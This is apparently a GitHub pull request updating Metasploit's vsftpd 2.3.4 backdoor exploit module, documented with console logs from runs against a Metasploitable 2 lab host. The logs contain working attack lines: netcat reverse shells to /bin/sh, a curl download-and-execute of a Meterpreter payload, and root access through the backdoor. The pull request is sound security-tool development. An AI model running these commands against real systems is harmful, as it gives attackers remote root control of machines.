Skip to content

vsftpd_234_backdoor: Port to FTP mixin#21377

Open
g0tmi1k wants to merge 6 commits into
rapid7:masterfrom
g0tmi1k:vsftpd_234_backdoor
Open

vsftpd_234_backdoor: Port to FTP mixin#21377
g0tmi1k wants to merge 6 commits into
rapid7:masterfrom
g0tmi1k:vsftpd_234_backdoor

Conversation

@g0tmi1k

@g0tmi1k g0tmi1k commented Apr 26, 2026

Copy link
Copy Markdown
Contributor

This PR is for:

  • Use FTP mixin (auto handles report_* for FTP service)
  • Update workspace more (about the backdoor service)
  • (Hopefully) higher chance of success when repeating the check/exploiting
  • Update metadata (notes)
             current  name     hosts  services  vulns  creds  loots  notes
             -------  ----     -----  --------  -----  -----  -----  -----
Before ->    *        default  1      1         1      0      0      0
After  ->    *        default  1      3         1      0      0      3

Target is metasploitable 2.

Before

  • Workspace is about FTP
$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
use exploit/unix/ftp/vsftpd_234_backdoor;
set RHOSTS 10.0.0.10;
set LHOST tap0;
set PAYLOAD cmd/unix/reverse_netcat'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
[*] Using configured payload cmd/linux/http/x86/meterpreter_reverse_tcp
RHOSTS => 10.0.0.10
LHOST => tap0
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(unix/ftp/vsftpd_234_backdoor) > run
[+] mkfifo /tmp/fygwefm; nc 10.0.0.1 4444 0</tmp/fygwefm | /bin/sh >/tmp/fygwefm 2>&1; rm /tmp/fygwefm
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.10:21 - Running automatic check ("set AutoCheck false" to disable)
[*] 10.0.0.10:21 - Checking if backdoor has already been triggered (else exploit will fail)
[*] 10.0.0.10:21 - Connecting to FTP service
[*] 10.0.0.10:21 - Checking FTP banner
[*] 10.0.0.10:21 - FTP banner: 220 (vsFTPd 2.3.4)
[*] 10.0.0.10:21 - FTP banner hints its vulnerable: 220 (vsFTPd 2.3.4)
[*] 10.0.0.10:21 - Trying to log into FTP (User: osgsV)
[+] 10.0.0.10:21 - The target appears to be vulnerable. vsftpd 2.3.4 banner detected; backdoor may be present
[*] 10.0.0.10:21 - Connecting to FTP service
[*] 10.0.0.10:21 - Checking FTP banner
[*] 10.0.0.10:21 - FTP banner: 220 (vsFTPd 2.3.4)
[*] 10.0.0.10:21 - Trying to log into FTP via backdoor. User: yQ:)
[*] 10.0.0.10:21 - 331 Please specify the password.
[*] 10.0.0.10:21 - Trying to log into FTP via backdoor. Password: K9
[*] 10.0.0.10:21 - Connecting to backdoor on 6200/TCP
[+] 10.0.0.10:21 - Backdoor has been spawned!
[*] 10.0.0.10:21 - Trying 'id' command
[+] 10.0.0.10:21 - UID: uid=0(root) gid=0(root)
[*] 10.0.0.10:21 - Running: mkfifo /tmp/weohinf; nc 10.0.0.1 4444 0</tmp/weohinf | /bin/sh >/tmp/weohinf 2>&1; rm /tmp/weohinf
[*] Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.10:49476) at 2026-05-21 10:27:29 +0100

id
uid=0(root) gid=0(root)
^Z
Background session 1? [y/N]  y
msf exploit(unix/ftp/vsftpd_234_backdoor) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      1         1      0      0      0

msf exploit(unix/ftp/vsftpd_234_backdoor) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10             Unknown                    device

msf exploit(unix/ftp/vsftpd_234_backdoor) > services
Services
========

host       port  proto  name  state  info          resource  parents
----       ----  -----  ----  -----  ----          --------  -------
10.0.0.10  21    tcp    ftp   open   vsFTPd 2.3.4  {}

msf exploit(unix/ftp/vsftpd_234_backdoor) > vulns

Vulnerabilities
===============

Timestamp                Host       Service       Resource  Name                                  References
---------                ----       -------       --------  ----                                  ----------
2026-05-21 09:27:22 UTC  10.0.0.10  ftp (21/tcp)  {}        exploit/unix/ftp/vsftpd_234_backdoor  CVE-2011-2523,OSVDB-73573,URL-http://pastebin.com/AetT9sS5,URL-http://scarybeastsecurity.blogspot.com/2011/0
                                                                                                  7/alert-vsftpd-download-backdoored.html

msf exploit(unix/ftp/vsftpd_234_backdoor) >

After

  • Workspace is richer
$ ./msfconsole -q -x 'db_status; workspace -D; setg VERBOSE true;
use exploit/unix/ftp/vsftpd_234_backdoor;
set RHOSTS 10.0.0.10;
set LHOST tap0;
set PAYLOAD cmd/unix/reverse_netcat'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
[*] Using configured payload cmd/linux/http/x86/meterpreter_reverse_tcp
RHOSTS => 10.0.0.10
LHOST => tap0
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(unix/ftp/vsftpd_234_backdoor) > run
[+] mkfifo /tmp/tvylewx; nc 10.0.0.1 4444 0</tmp/tvylewx | /bin/sh >/tmp/tvylewx 2>&1; rm /tmp/tvylewx
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.10:21 - Running automatic check ("set AutoCheck false" to disable)
[*] 10.0.0.10:21 - Checking if backdoor has already been triggered (else exploit will fail)
[*] 10.0.0.10:21 - Connecting to FTP server...
[*] 10.0.0.10:21 - Connected to target FTP server
[*] 10.0.0.10:21 - FTP banner hints it's vulnerable: vsFTPd 2.3.4
[*] 10.0.0.10:21 - Trying to log into FTP (User: eXv)
[+] 10.0.0.10:21 - The target appears to be vulnerable. VSFTPD 2.3.4 banner detected & correct response code - backdoor may be present
[*] 10.0.0.10:21 - Connecting to FTP server...
[*] 10.0.0.10:21 - Connected to target FTP server
[*] 10.0.0.10:21 - Trying to log into FTP via backdoor. User: cpRtk:)
[*] 10.0.0.10:21 - 331 Please specify the password.
[*] 10.0.0.10:21 - Trying to log into FTP via backdoor. Password: v
[*] 10.0.0.10:21 - Trying to connect to backdoor on 6200/TCP
[+] 10.0.0.10:21 - Backdoor has been spawned!
[*] 10.0.0.10:21 - Trying 'id' command
[+] 10.0.0.10:21 - UID: uid=0(root) gid=0(root)
[*] 10.0.0.10:21 - Running: mkfifo /tmp/hcbmk; nc 10.0.0.1 4444 0</tmp/hcbmk | /bin/sh >/tmp/hcbmk 2>&1; rm /tmp/hcbmk
[*] 10.0.0.10:21 - Payload sent — awaiting callback
[*] Command shell session 1 opened (10.0.0.1:4444 -> 10.0.0.10:49470) at 2026-05-21 10:25:49 +0100

id
uid=0(root) gid=0(root)
^Z
Background session 1? [y/N]  y
msf exploit(unix/ftp/vsftpd_234_backdoor) > workspace -v

Workspaces
==========

current  name     hosts  services  vulns  creds  loots  notes
-------  ----     -----  --------  -----  -----  -----  -----
*        default  1      3         1      0      0      3

msf exploit(unix/ftp/vsftpd_234_backdoor) > hosts

Hosts
=====

address    mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------    ---  ----  -------  ---------  -----  -------  ----  --------
10.0.0.10             Unknown                    device

msf exploit(unix/ftp/vsftpd_234_backdoor) > services
Services
========

host       port  proto  name   state  info                              resource  parents
----       ----  -----  ----   -----  ----                              --------  -------
10.0.0.10  21    tcp    ftp    open   vsFTPd 2.3.4                      {}        tcp (21/tcp)
10.0.0.10  21    tcp    tcp    open                                     {}
10.0.0.10  6200  tcp    shell  open   VSFTPD 2.3.4 backdoor bind shell  {}

msf exploit(unix/ftp/vsftpd_234_backdoor) > vulns

Vulnerabilities
===============

Timestamp                Host       Service       Resource  Name                                  References
---------                ----       -------       --------  ----                                  ----------
2026-05-21 09:25:42 UTC  10.0.0.10  ftp (21/tcp)  {}        exploit/unix/ftp/vsftpd_234_backdoor  CVE-2011-2523,OSVDB-73573,URL-http://pastebin.com/AetT9sS5,URL-http://scarybeastsecurity.blogspot.com/2011/0
                                                                                                  7/alert-vsftpd-download-backdoored.html

msf exploit(unix/ftp/vsftpd_234_backdoor) > notes

Notes
=====

 Time                     Host       Service  Port  Protocol  Type                 Data
 ----                     ----       -------  ----  --------  ----                 ----
 2026-05-21 09:25:42 UTC  10.0.0.10  ftp      21    tcp       ftp.banner           {:banner=>"220 (vsFTPd 2.3.4)"}
 2026-05-21 09:25:42 UTC  10.0.0.10  ftp      21    tcp       ftp.cpe              {:cpe=>"cpe:/a:vsftpd_project:vsftpd:2.3.4"}
 2026-05-21 09:25:42 UTC  10.0.0.10  shell    6200  tcp       ftp.vsftpd_backdoor  {:uid=>"uid=0(root) gid=0(root)"}

msf exploit(unix/ftp/vsftpd_234_backdoor) >

@g0tmi1k g0tmi1k force-pushed the vsftpd_234_backdoor branch 6 times, most recently from ed17bda to 84ff0f0 Compare May 5, 2026 10:59
@g0tmi1k g0tmi1k force-pushed the vsftpd_234_backdoor branch 13 times, most recently from 1909a6f to f568fb6 Compare May 7, 2026 06:40
@dledda-r7 dledda-r7 requested a review from Copilot May 7, 2026 14:54

Copilot AI left a comment

Copy link
Copy Markdown
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Pull request overview

This PR updates the vsftpd_234_backdoor exploit module to improve reliability when the backdoor listener (6200/TCP) is already present, refine banner handling/logging, and modernize module metadata notes.

Changes:

  • Adds FTP banner normalization and additional service/note reporting for banners.
  • Adjusts check/exploit flow to better handle cases where 6200/TCP is already open (attempt existing shell, then re-exploit).
  • Updates module Notes metadata (reliability/stability/side effects) and tweaks wording.

Impact Analysis: isolated change; no meaningful downstream impact identified from diff.

Comment thread modules/exploits/unix/ftp/vsftpd_234_backdoor.rb Outdated
Comment thread modules/exploits/unix/ftp/vsftpd_234_backdoor.rb Outdated
Comment thread modules/exploits/unix/ftp/vsftpd_234_backdoor.rb Outdated
Comment thread modules/exploits/unix/ftp/vsftpd_234_backdoor.rb Outdated
Comment thread modules/exploits/unix/ftp/vsftpd_234_backdoor.rb
@g0tmi1k g0tmi1k force-pushed the vsftpd_234_backdoor branch 2 times, most recently from 05b6faf to f174ad5 Compare May 8, 2026 03:22
@g0tmi1k

g0tmi1k commented May 8, 2026

Copy link
Copy Markdown
Contributor Author

Thanks for the review @dledda-r7 - I believe everything has been addressed?

$ ./msfconsole -q -x 'db_status; workspace -D;
setg VERBOSE true; setg RHOSTS 10.0.0.10; setg LHOST tap0; use vsftpd_234_backdoor; run'
[*] Connected to msf. Connection type: postgresql.
[*] Deleted workspace: default
[*] Recreated the default workspace
VERBOSE => true
RHOSTS => 10.0.0.10
LHOST => tap0

Matching Modules
================

   #  Name                                  Disclosure Date  Rank       Check  Description
   -  ----                                  ---------------  ----       -----  -----------
   0  exploit/unix/ftp/vsftpd_234_backdoor  2011-07-03       excellent  Yes    VSFTPD 2.3.4 Backdoor Command Execution


Interact with a module by name or index. For example info 0, use 0 or use exploit/unix/ftp/vsftpd_234_backdoor

[*] Using exploit/unix/ftp/vsftpd_234_backdoor
[*] Using configured payload cmd/linux/http/x86/meterpreter_reverse_tcp
[*] Command to run on remote host: curl -so ./oFNSiDlsu http://10.0.0.1:8080/w5F5mvQl1V5uSRj-6oaPrQ;chmod +x ./oFNSiDlsu;./oFNSiDlsu&
[*] Fetch handler listening on 10.0.0.1:8080
[*] HTTP server started
[*] Adding resource /w5F5mvQl1V5uSRj-6oaPrQ
[*] Started reverse TCP handler on 10.0.0.1:4444
[*] 10.0.0.10:21 - Running automatic check ("set AutoCheck false" to disable)
[*] 10.0.0.10:21 - Checking if backdoor has already been triggered (else exploit will fail)
[*] 10.0.0.10:21 - Connecting to FTP service
[*] 10.0.0.10:21 - Checking FTP banner
[*] 10.0.0.10:21 - FTP banner: 2.3.4
[*] 10.0.0.10:21 - FTP banner hints it's vulnerable
[*] 10.0.0.10:21 - Trying to log into FTP (User: r3jye1)
[+] 10.0.0.10:21 - The target appears to be vulnerable. vsftpd 2.3.4 banner detected; backdoor may be present
[*] 10.0.0.10:21 - Connecting to FTP service
[*] 10.0.0.10:21 - Checking FTP banner
[*] 10.0.0.10:21 - FTP banner: 2.3.4
[*] 10.0.0.10:21 - Trying to log into FTP via backdoor. User: gh7l1:)
[*] 10.0.0.10:21 - 331 Please specify the password.
[*] 10.0.0.10:21 - Trying to log into FTP via backdoor. Password: ESS
[*] 10.0.0.10:21 - Connecting to backdoor on 6200/TCP
[+] 10.0.0.10:21 - Backdoor has been spawned!
[*] 10.0.0.10:21 - Trying 'id' command
[+] 10.0.0.10:21 - UID: uid=0(root) gid=0(root)
[*] 10.0.0.10:21 - Running: curl -so ./oFNSiDlsu http://10.0.0.1:8080/w5F5mvQl1V5uSRj-6oaPrQ;chmod +x ./oFNSiDlsu;./oFNSiDlsu&
[*] Client 10.0.0.10 requested /w5F5mvQl1V5uSRj-6oaPrQ
[*] Sending payload to 10.0.0.10 (curl/7.18.0 (i486-pc-linux-gnu) libcurl/7.18.0 OpenSSL/0.9.8g zlib/1.2.3.3 libidn/1.1)
[*] Meterpreter session 1 opened (10.0.0.1:4444 -> 10.0.0.10:36314) at 2026-05-08 04:24:41 +0100

meterpreter >

@g0tmi1k g0tmi1k requested a review from dledda-r7 May 8, 2026 03:25
@g0tmi1k g0tmi1k force-pushed the vsftpd_234_backdoor branch from f174ad5 to b09ac50 Compare May 12, 2026 05:39
@g0tmi1k g0tmi1k force-pushed the vsftpd_234_backdoor branch 2 times, most recently from 1a81bb9 to f516c32 Compare May 15, 2026 13:25
@g0tmi1k g0tmi1k changed the title vsftpd_234_backdoor: Improve single shot backdoor handling vsftpd_234_backdoor: Port to FTP mixin May 15, 2026
@g0tmi1k g0tmi1k force-pushed the vsftpd_234_backdoor branch 6 times, most recently from a183755 to 01d33b5 Compare May 19, 2026 13:38
@g0tmi1k

g0tmi1k commented May 21, 2026

Copy link
Copy Markdown
Contributor Author

Think I've finished tweaking with this PR!

Fort the after test, I had also applied #21416 & #21396, not in the before section.

@g0tmi1k g0tmi1k force-pushed the vsftpd_234_backdoor branch from 01d33b5 to 1d929f1 Compare May 26, 2026 14:28
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment

Projects

Status: Todo

Development

Successfully merging this pull request may close these issues.

5 participants